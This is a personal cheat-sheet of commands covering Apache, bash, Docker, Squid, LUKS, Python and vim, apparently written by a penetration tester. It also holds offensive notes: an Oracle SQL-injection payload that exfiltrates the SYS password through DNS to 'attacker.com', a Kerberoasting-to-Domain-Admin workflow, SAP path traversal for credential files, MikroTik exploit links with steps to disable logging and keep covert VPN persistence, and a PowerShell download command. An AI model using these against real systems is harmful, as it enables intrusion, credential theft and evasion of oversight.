This is a dump of things I learn as I go. This will mostly contain notes of commands that I want to be easy for me to access, and possibly not much explanation on some of them will be given. Feel free to explore though. :)
Enable the http_proxy module
# a2enmod proxy_http
Create a VirtualHost, that looks somewhat like this:
<VirtualHost *:80>
ServerAdmin admin@gilgalab.com
ServerName subdomain.domain.com.br
ServerAlias subdomain.domain.com
ProxyPass "/" "http://localhost/"
ProxyPassReverse "/" "http://localhost/"
<Proxy *>
Authtype Basic
Authname "Authentication? What's that?"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Proxy>
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel debug
ErrorLog ${APACHE_LOG_DIR}/error_somedomain.log
CustomLog ${APACHE_LOG_DIR}/access_somedomain.log combined
</VirtualHost>
Edit the website VirtualHost and add this:
<Proxy *>
Authtype Basic
Authname "Some message here"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Proxy>
Then create the .htpasswd file
# htpasswd -c /etc/apache2/.htpasswd username
Restart apache
# service apache2 restart
while :; do
echo "This is infinite!"
sleep 5
done
if [ ! -d "/tmp" ]; then
echo "Directory /tmp does not exist"
else
echo "It exists!"
fi
#!/bin/bash
while read line; do
echo "Line = $line"
done; < your_file.txt
echo "Script received $# args"
if [[ $# < 2 ]]; then
echo "Expected at least 2 arguments to the script"
exit -1
fi
now=$(date +"%Y.%m.%d %H:%M:%S"
echo $now
ctrl-a - move the cursor to the beginning of the current line
ctrl-e - move the cursor to the end of the current line
alt-b - move the cursor backwards one word
alt-f - move the cursor forward one word
ctrl-k - delete from cursor to the end of the line
ctrl-u - delete from cursor to the beginning of the line
alt-d - delete the word in front of the cursor
ctrl-w - delete the word behind of the cursor
These are my notes as I learn about Docker.
In order to use the CLI, the current user needs either be root or be part of
the docker
group.
Create a docker file, then run:
$ docker build -t <imagename> .
$ docker images
List the images and see which one you want to instantiate (means, create a container of)
Then run:
$ docker run -d -p 4000:80 imagename
The above command creates a container from imagename
. Supposing that the
imagename
container exposes port 80, that port will be mapped to the host’s
port 4000. The -d
option tells that we want to start this container in the
background.
$ docker login
$ docker run -p 4000:80 <username>/<repository>:<tag>
In my case, I created the friendlyhello
repository with the v1
tag in my
docker cloud, so I can run:
$ docker run -p 4000:80 typoon/friendlyhello:v1
$ docker ps
$ docker container ls
$ docker stop <id>
Where <id>
is taken from the list of running containers
First you need an account with Docker Cloud (or you need to setup your own registry). Go to https://cloud.docker.com and create an account.
The run:
$ docker login
$ docker tag <imagename> <user>/<imagename>:<tag>
$ docker push <user>/<imagename>:<tag>
For example, I have created the friendlyhello
image and want to give it a
tag called v1
, so I use:
$ docker tag friendlyhello typoon/friendlyhello:v1
$ docker push typoon/friendlyhello:v1
If I check the docker cloud website now, my image will be there.
$ docker build -t friendlyname .
$ docker run -p 4000:80 friendlyname
$ docker run -d -p 4000:80 friendlyname
$ docker ps
$ docker stop <hash>
$ docker ps -a
$ docker kill <hash>
$ docker rm <hash>
$$ docker rm $(docker ps -a -q)
$ docker images -a
$ docker rmi <imagename>
$$ docker rmi $(docker images -q)
$ docker login
<image>
for upload to registry$ docker tag <image> username/repository:tag
$ docker push username/repository:tag
$ docker run username/repository:tag
GET /_cat/indices?v
In order for the highlight field to return all the data in the target field,
set the number_of_fragments
option to 0
. For example:
GET /idx/_search
{
"size": 1,
"_source": ["field1", "field2", "field3","field4"],
"query": {
"regexp": {
"field1": ".*whatever.*"
}
},
"highlight": {
"fields": {
"field1": {"number_of_fragments" : 0}
}
},
"sort": [
{
"field4": {
"order": "desc"
}
}
]
}
Getting interactive reverse shell SSH User Enumeration SQLi retrieval via DNS
Using python:
python -c 'import pty; pty.spawn("/bin/bash")'
http://seclists.org/oss-sec/2018/q3/125
This can be used against Oracle. Change the .attacker.com
to a hostname you
control.
SELECT title, publisher FROM books WHERE publisher = 'xpto'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.attacker.com')--
In order to use this, we need at least one valid DC user.
GetUserSPMs.py - retrieves principal names from the DC
GetUserSPMs.py -request -dc-ip [domain-controller-ip] domain/username > hashes.txt
The retrieved hashes can be cracked with hashcat
using -m 13100 (Kerberos TGS
e23)
After you get the passwords, get the hostnames that are in the hashes.txt file
and see if you can connect to some of them using the cracked passwords. Use
smbclient.py
for that.
smbclient.py "domain.com/username@server"
Use the shares
command to see the available shares. Use the use
command to
connect to a share. Ideally we want to connect to the admin$
share to see if
the user we have is an administrator on that box or not.
After this, you can use wmiexec.py
to get an interactive shell in the remote
machine if you have an admin user.
wmiexec.py "domain.com/username@server"
In this shell, you can try to get the name of the users in the “Domain Admins” group, with the following command:
net group "Domain Admins" /domain
If the user you have is there, then you are done :D
apt install bloodhound neo4j
This thing is loud. Use the following bash function to launch it:
# run neo4j and bloodhound
bhound() {
echo "[+] running neo4j at process id:"
neo4j console 1>/dev/null 2>/dev/null &
echo ""
echo "[+] remember to change pass at localhost:7474"
echo "[+] if bloodhound looks goofed up, hit Ctrl+R"
echo ""
echo "[+] ingestors:"
echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.exe"
echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.ps1"
bloodhound
}
Find the Domain Controllers in the network
dig -t ANY _ldap._tcp.dc._msdcs.example.com
Change example.com
with the hostname used in the network.
List users in the box:
net users
List processes running:
tasklist.exe
List the services that are running:
sc query type= service
Stop a service
sc stop ServiceNameHere
If the above does not work, try:
runas /user:Administrator sc stop ServiceNameHere
Is the service marked as non stoppable?
Change it’s configuration so it won’t automatically start and then kill the process associated with the service. TODO: write down the commands here to do that.
Check out these links:
https://nest.parrotsec.org/security-tools/metasploit-framework/raw/36bae4066a05b66f2f572082d42e3b23f1e9c52d/data/wordlists/sap_icm_paths.txt
http://sap_server/scheduler/ -> Check the source of the page looking for
UIUtilJavaScriptJS
. Parameter to this endpoint can be used to read arbitrary
files. For example:
UIUtilJavaScriptJS?../../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.key
UIUtilJavaScriptJS?../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.properties
Decrypt the SecStore.key file to get admin creds.
Check the aws-downloader.py
script
Find subdomains:
Find files / sensitive data:
Find credentials
Find files key4.db
and logins.json
.
Click the hamburger menu and then click “Logins and Passwords”
TODO
TODO
Device logs: Access chrome://device-log
Stored passwords: Access chrome://settings/passwords
If the above does not work, the following might:
See stored passwords:
* Open Chrome.
* On the right side of the toolbar, click the circular Profile, then click Passwords.
* From there, you can view, delete, or export your saved passwords.
* View saved passwords: Click the eye icon to the right of each password to see it. You’ll be prompted to type your computer password in to see it in plain text.
* Delete saved passwords: Click the three vertical dots to the right of each password, then click Remove.
* Export saved passwords: To the right of “Saved Passwords,” click the three vertical dots, and click Export passwords.
There is a vulnerability on RouterOS that allows credentials to be retrieved from the router. You just need to be in the same network as the router and the exploit is executed on Layer (no need to have an IP address).
If you are sure that the router you are targeting is vulnerable but the exploit is not working, try changing your MAC address to a Mikrotik one (just clone the router’s MAC address and change the value of the last octect).
Exploit here: https://github.com/BasuCert/WinboxPoC And here: https://github.com/hackerhouse-opensource/exploits/blob/master/mikrotik-jailbreak.txt
First thing to do as soon as you gain access to the router is disable logging:
/system logging
print
Replace X with the number of the logging entry in the table reported by the
print
command.
set X disabled=yes
In order to keep persistence in the router, a cool way to do it is to have the router connect back to an OpenVPN server you own and make sure that SSH is running on the Mikrotik router so you can connect back to it from the VPN.
Run the OpenVPN server on port 443 in order to make it less suspicious.
Here is the command to create the VPN:
/interface ovpn-client
add connect-to=IP_OpenVPN_Server mac-address=FE:A8:8E:09:CA:A0 name=ovpn-out1 password=OpenVPNpassword port=443 user=OpenVPNuser
If that does not work, there might be a firewall configured blocking access. Try the following commands to see if it opens up:
/ip firewall address-list
add address=YourIP list=default_management
add address=RoutersVPNip list=default_management
/ip firewall filter
add action=accept chain=forward comment="default configuration" src-address-list=default_management
Sometimes after the computer idles for a bit, my mouse stops working and I get the error (on dmesg) saying:
[2579695.232432] usb 1-2: new full-speed USB device number 81 using xhci_hcd
[2579695.232590] usb 1-2: Device not responding to setup address.
[2579695.440575] usb 1-2: Device not responding to setup address.
[2579695.648431] usb 1-2: device not accepting address 81, error -71
[2579695.648525] usb usb1-port2: unable to enumerate USB device
[2579696.780284] usb 1-2: new full-speed USB device number 82 using xhci_hcd
[2579696.912235] usb 1-2: device descriptor read/64, error -71
Disconnecting the device for a few seconds and then reconnecting it sometimes works. If that doesn’t work, try this (as root):
echo Y > /sys/module/usbcore/parameters/old_scheme_first
echo Y > /sys/module/usbcore/parameters/use_both_schemes
Then disconnect the device for a few seconds and reconnect it.
NOTE: this is most likely unrelated to the issue I have, but not sure what else to try at this point.
Not sure yet why this happens, or even if this solves the issue but should be worth trying.
As root, run:
echo XHC > /proc/acpi/wakeup
Check this post for more info: https://askubuntu.com/questions/987755/suspend-not-working-help-needed-to-debug
Lynis - https://cisofy.com/documentation/lynis/get-started/
Analyze traffic with wireshark and SSH.
ssh root@example.com tcpdump -w - 'port !22' | wireshark -k -i -
I had two laptops (A and B) connected to the same wifi.
When laptop A pinged the router, response time was around 3ms. When laptop B pinged the router, response time was around 3ms.
When laptop A pinged laptop B, response time was over 300ms.
Seems to be an issue with wireless card power. On both laptops, run:
sudo iwconfig wlan0 power off
Replace wlan0
with the name of your interface. Test pinging again.
For me, this solved the issue and pings between laptop A and B are now around 4ms.
If you are using the iwlwifi
driver, what helped me was editing the
/etc/modprobe.d/iwlwifi.conf
file and adding the following lines to it:
options iwlwifi swcrypto=1
options iwlwifi 11n_disable=8
options iwlwifi bt_coex_active=0
Turn off wifi, reload the iwlwifi module (rmmod iwlwifi && modprobe iwlwifi
)
and check if it got any better.
mkdir /mnt/ramdisk
mount -t ramfs -o size=512M ramfs /mnt/ramdisk
$ find / -perm -4000
$ find / -type f -perm -o+w
$ find / -iname *.c -exec grep password '{}' \;
$ pavucontrol
$ vmhgfs-fuse .host:ShareName dest_folder/
Create the volume (replace /dev/sdb1 with the partition of the volume to be encrypted):
# cryptsetup --cipher aes-xts-plain64 --hash sha256 -v --verify-passphrase luksFormat /dev/sdb1
Open the volume:
# cryptsetup luksOpen /dev/sdb1 somename
The above step creates a device on /dev/mapper/somename
. This needs to be
formatted now:
# mkfs.ext4 /dev/mapper/somename
Mount the encrypted volume now:
# mkdir /mnt/somename
# mount /dev/mapper/somename /mnt/somename
When done using the volume, don’t forget to unmount and close it:
# umount /mnt/somename
# cryptsetup luksClose /dev/mapper/somename
Now, in order to use the volume again, just use a luksOpen
, mount the device
that will be on /dev/mapper
and you are good to go.
Not sure if negative pattern is the right term, but that’s how I wrote it.
These are ways of deleting a list of files that do not match a certain pattern.
For example, let’s say you want to delete all files in a directory except the
ones that end in .zip
$ shopt -s extglob
$ rm -v !(*.zip)
$ shopt -u extglob
Another way using find:
$ find /dir/ -type f -not -name '*.zip' -delete
Source: https://www.tecmint.com/delete-all-files-in-directory-except-one-few-file-extensions/
We want Squid with SSL support, so we have to compile it ourselves. Download it from http://www.squid-cache.org/Versions/
Install dependencies:
apt-get -y install \
libcppunit-dev \
libsasl2-dev \
libxml2-dev \
libkrb5-dev \
libdb-dev \
libnetfilter-conntrack-dev \
libexpat1-dev \
libcap2-dev \
libldap2-dev \
libpam0g-dev \
libgnutls28-dev \
libssl-dev \
libdbi-perl \
libecap3 \
libecap3-dev
Compile with:
$ ./configure '--build=x86_64-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' 'BUILDCXXFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' '--datadir=/usr/share/squid' '--sysconfdir=/etc/squid' '--libexecdir=/usr/lib/squid' '--mandir=/usr/share/man' '--enable-inline' '--disable-arch-native' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd,rock' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth-basic=DB,fake,getpwnam,NCSA,NIS' '--enable-auth-digest=file' '--enable-auth-negotiate=kerberos,wrapper' '--enable-auth-ntlm=fake' '--enable-external-acl-helpers=file_userip,session,SQL_session,unix_group,wbinfo_group' '--enable-url-rewrite-helpers=fake' '--enable-eui' '--enable-esi' '--enable-icmp' '--enable-zph-qos' '--enable-ecap' '--disable-translation' '--with-swapdir=/var/spool/squid' '--with-logdir=/var/log/squid' '--with-pidfile=/var/run/squid.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-build-info=Ubuntu linux' '--enable-linux-netfilter' 'build_alias=x86_64-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wall' 'LDFLAGS=-Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-Wdate-time -D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security' --with-openssl
$ make
$ make install
Create a file /etc/systemd/system/squid.service
with the following contents:
## Downloaded from:
## https://raw.githubusercontent.com/squid-cache/squid/master/tools/systemd/squid.service
## Copyright (C) 1996-2019 The Squid Software Foundation and contributors
##
## Squid software is distributed under GPLv2+ license and includes
## contributions from numerous individuals and organizations.
## Please see the COPYING and CONTRIBUTORS files for details.
##
[Unit]
Description=Squid Web Proxy Server
Documentation=man:squid(8)
After=network.target network-online.target nss-lookup.target
[Service]
Type=forking
PIDFile=/var/run/squid.pid
ExecStartPre=/usr/sbin/squid --foreground -z
ExecStart=/usr/sbin/squid -sYC
ExecReload=/bin/kill -HUP $MAINPID
KillMode=mixed
[Install]
WantedBy=multi-user.target
Enable the service
systemctl enable squid
Here is a simple squid.conf
for Squid 3, that requires the user to
authenticate. It runs on port 9989:
Note:
Do not forget to replace the tls-cert
and key
values for the
https_port
. I am using my Let's Encrypt
cert here.
#http_access deny
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm Gilgalab
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
forwarded_for delete
# Port
http_port 9987
https_port 9989 tls-cert=/etc/letsencrypt/live/www.gilgalab.com/fullchain.pem key=/etc/letsencrypt/live/www.gilgalab.com/privkey.pem
# Logs
access_log daemon:/var/log/squid/access.log squid
# Process configuration
cache_effective_user squid
cache_effective_group squid
dns_v4_first on
To create the users:
$ sudo htpasswd -c /etc/squid/passwords some_username
$ sudo service squid restart
powershell.exe -nologo -noprofile -command "(new-object System.Net.WebClient).Downloadfile(\"http://10.11.0.46/PSTools.zip\", \"c:\temp\PSTools.zip\")"
powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('PSTools.zip', '.'); }"
runas
Download PSTools from sysinternals and use:
psexec \\machine_name -u user -p password program.exe programargs
To properly format a heredoc string, use textwrap.dedent
import textwrap
mystr = """
Hey!
How are you?
"""
print(mystr)
print(textwrap.dedent(mystr))
SQAlchemy
seems to be the common way of dealing with SQL stuff in Python.
There is also DBApi
which seems to be the basic Python layer for databases,
but then you have to take care yourself on handling multiple different
backends.
Table creation on SQLAlchemy:
Here is the documentation for Column
:
https://docs.sqlalchemy.org/en/13/core/metadata.html#sqlalchemy.schema.Column
In order to specify the database to connect to, provide a database URL as explained here: https://docs.sqlalchemy.org/en/13/core/engines.html#database-urls
If you just need to serve the files in the current directory:
python3 -m http.server
If you want to define port and address to listen to
python3 -m http.server 9876 --bind 127.0.0.1
If you need a simple HTTP server in your code:
import http.server
import socketserver
ADDR = "127.0.0.1" # or blank to listen on 0.0.0.0
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer((ADDR, PORT), Handler) as httpd:
print("Server started at %s:%d" %(ADDR, PORT))
httpd.serve_forever()
These examples use the requests
library.
pip3 install requests
import requests
cookies = {"cookie-name" : "cookie-value",
"other-cookie" : "other-value"
}
URL = 'https://www.gilgalab.com/python3/post-example'
data = {'param1': 'value', 'param2': 'value'}
proxies = {
'https' : 'https://localhost:8080',
'http' : 'http://localhost:8080'
}
r = requests.post(url=URL, data=data, cookies=cookies, proxies=proxies,
verify=False, allow_redirects=False)
print(r.text)
From command line
cat file.json | python3 -m json.tool
From code:
TKTK
import base64
# Encode a string
mystr = 'abc'
encoded = base64.b64encode(mystr.encode('utf-8')))
decoded = base64.b64decode(encoded)
If you are having issues deconding strings, try to use .decode('cp437')
If you want to use argument options when running a python script from the command line such as:
python3 somescript.py -name Gilgamesh -host gilgalab.com
Use the following:
import argparse
if __name__ == '__main__':
segment_types = ['s1', 's2']
fuzzer_types = ['ft1', 'ft2']
# Create the argument parser
parser = argparse.ArgumentParser()
# Options that can be passed to the script
# This is a required one
parser.add_argument('-f', '--fuzzer', help='Type of fuzzer to use',
default='myfuzz', choices=fuzzer_types, required=True)
# This one is not required
parser.add_argument('-d', '--directory',
help='Where to save results',
default='fuzz-messages')
# Just short option. Result goes into args.output due to `dest` param
parser.add_argument(
'-o', dest='output', help='Directory where to save stuff',
required=True)
# Options that are mutually exclusive (either one is accepted or the
# other)
group = parser.add_mutually_exclusive_group()
group.add_argument('-a', '--all', help='Generate fuzzers for all types', action='store_true')
group.add_argument('-s', '--segment', help='Segment name to generate a fuzzer for', choices=segment_types)
args = parser.parse_args()
# Properties in the `args` var will have the same name as the long
# name of the parameter
if args.all:
segment_types = get_segment_types()
elif args.segment:
segment_types = [args.segment]
# This check forces one of these parameter to be provided
# Couldn't figure out how to do it with the ArgumentParser class
if not args.all and not args.segment:
print("Can't find segments to generate fuzzer for. Aborting...")
print("Did you give the program the `-a` or `-s` option?")
exit(-1)
output_directory = args.directory
fuzzer_type = args.fuzzer
Add the following to the start of the script
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
In a decent format:
import datetime
import time
now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H%M%S')
Just run the application in debug mode:
$ export FLASK_ENV=development
$ flask run
Or in code
from flask import Flask
app = Flask(__name__)
app.run(debug=True)
With Python 3:
$ python3 -m http.server 8000 --bind 127.0.0.1
With Python 2:
$ python2 -m SimpleHTTPServer
$ python2 -c 'import BaseHTTPServer as bhs, SimpleHTTPServer as shs; bhs.HTTPServer(("127.0.0.1", 8888), shs.SimpleHTTPRequestHandler).serve_forever()'
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem',
server_side=True)
httpd.serve_forever()
$ sudo apt-get install python-pyftpdlib
$ python -m pyftpdlib -p 21
$ cat file.json | python -m json.tool
import sys
try:
somethingInvalid()
except:
e = sys.exc_info()
print("Exception: [%s][%s]" % (e[0], e[1]))
If vim is slow when using, there are a few tricks to try to figure out why.
First activate time measurement for syntax highlighting:
:syntime on
Navigate a little bit in the file and then:
:syntime report
Check which one of the highlights is taking too long.
If syntax is not the problem, it could be one of the plugins functions or files being loaded that are making things slow. For that, we need to profile those calls.
:profile start /tmp/vimprofile.log
:profile func *
:profile file *
Navigate around the file a little bit in a way that reproduce the slow down being observed and then:
:profile pause
Examine the /tmp/vimprofile.log
file now looking for functions that are
taking too long to execute or that are being executed too many times.
:%y+
%
- Execute next command for all lines in buffery
- Yank (copy)+
- To the +
bufferArduino plugin works only on .ino files.
Make sure to set the port where the Arduino is in the system, using
:ArduinoChoosePort
Configure the path to the Arduino installation in the .vimrc
file by setting
the g:arduino_dir
global variable.
** Compile and verify **
:ArduinoVerify
Compile and upload
<leader>au
Select board
<leader>ab